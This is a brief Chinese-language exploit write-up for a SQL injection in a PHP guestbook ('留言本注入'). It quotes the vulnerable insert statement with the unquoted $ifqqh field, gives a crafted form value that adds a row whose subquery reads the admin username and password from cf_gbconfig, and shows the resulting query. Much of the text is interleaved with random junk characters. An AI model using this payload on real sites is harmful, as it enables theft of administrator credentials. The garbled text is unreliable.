留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
) k& W3 Y: N( l1 I- A( N! v
, |5 O& t" R# p; a$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
' L, H% H& R8 E) ]$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响9 Z& }) `3 J: x* M& t6 q) s: x
9 q4 ]% i6 P7 O' E+ ^5 ]; z% t提交的时候把ifqqh的值改一下。变成
0 ~* Z2 D4 H; y6 x3 I# {% E: q5 E& [
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
$ O# J1 j- Y) g& h- | x/ O% l, [- X7 y* p- I2 B
这样SQL插入语句就变了." }( I% n! J- ~' m# D
7 f) \: Q9 { W( jinsert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)! w/ j b |% [9 H1 b6 h7 \$ E
3 j% _/ S. c! f) y. U& {% y构造了另外一句SQL。并且把帐号密码读出来。
0 M9 n: ? K- S# X
& ~ k7 o6 I. ~; E& x* { |